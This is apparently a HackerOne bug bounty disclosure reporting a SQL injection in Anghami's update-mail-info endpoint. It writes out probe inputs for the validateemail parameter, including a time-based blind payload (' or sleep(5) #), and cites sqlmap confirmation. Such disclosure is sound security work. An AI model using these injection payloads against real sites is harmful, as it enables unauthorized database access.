Anghami: [https://www.anghami.com/updatemailinfo/] Sql Injection

2015-09-01T14:51:06
ID H1:86468
Type hackerone
Reporter jayden
Modified 2015-10-02T11:49:34

Description

Hi ,

I'd like to report a sql injection issue, first you need to be logged in in order to exploit this issue . The vulnerable parameter is validateemail .

some tests

validateemail=sdfsdf@sdfsd.com&phoneormail= => Please Check Your email to verify validateemail=sdfsdf@sdfsd.com'&phoneormail= => *message dissapeared validateemail=sdfsdf@sdfsd.com''&phoneormail= => Please Check Your email to verify validateemail=test@yopmail.com' or sleep(5) #&sid=0&lang=en&phoneormail= => server timeout

POC

db version : MySQL 5.0.11

you can find a screenshot from sqlmap scan confirming the issue .

Thanks